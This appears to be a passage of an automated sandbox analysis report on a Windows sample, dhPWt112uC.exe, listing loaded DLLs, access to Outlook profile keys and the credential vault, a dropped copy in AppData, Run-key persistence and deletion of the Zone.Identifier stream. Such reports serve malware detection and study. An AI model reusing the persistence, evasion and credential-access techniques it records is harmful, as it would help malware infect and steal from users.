Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\dhPWt112uC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\dhPWt112uC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\dhPWt112uC.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: dhPWt112uC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: dhPWt112uC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: dhPWt112uC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: CFss.pdb source: dhPWt112uC.exe, newapp.exe.4.dr
Source:	Binary string: CFss.pdbSHA256Z#5 source: dhPWt112uC.exe, newapp.exe.4.dr

Source: dhPWt112uC.exe

Static PE information: 0xEB7C088D [Sat Mar 12 13:20:13 2095 UTC]

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BFE7DC push es; ret	0_2_04BFE7E2
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BFEDBB push cs; ret	0_2_04BFEDC2
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BFEE60 push cs; ret	0_2_04BFEE62
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BFEF00 push cs; ret	0_2_04BFEF02
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 10_2_06F0B0D3 push es; ret	10_2_06F0B0E0
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_0564FA98 pushad ; retf	11_2_0564FAA5
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 15_2_069CB0D1 push es; ret	15_2_069CB0E0

Source: dhPWt112uC.exe	Static PE information: section name: .text entropy: 7.760942472660535
Source: newapp.exe.4.dr	Static PE information: section name: .text entropy: 7.760942472660535

Source: C:\Users\user\Desktop\dhPWt112uC.exe

File created: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Jump to dropped file

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\dhPWt112uC.exe

File opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
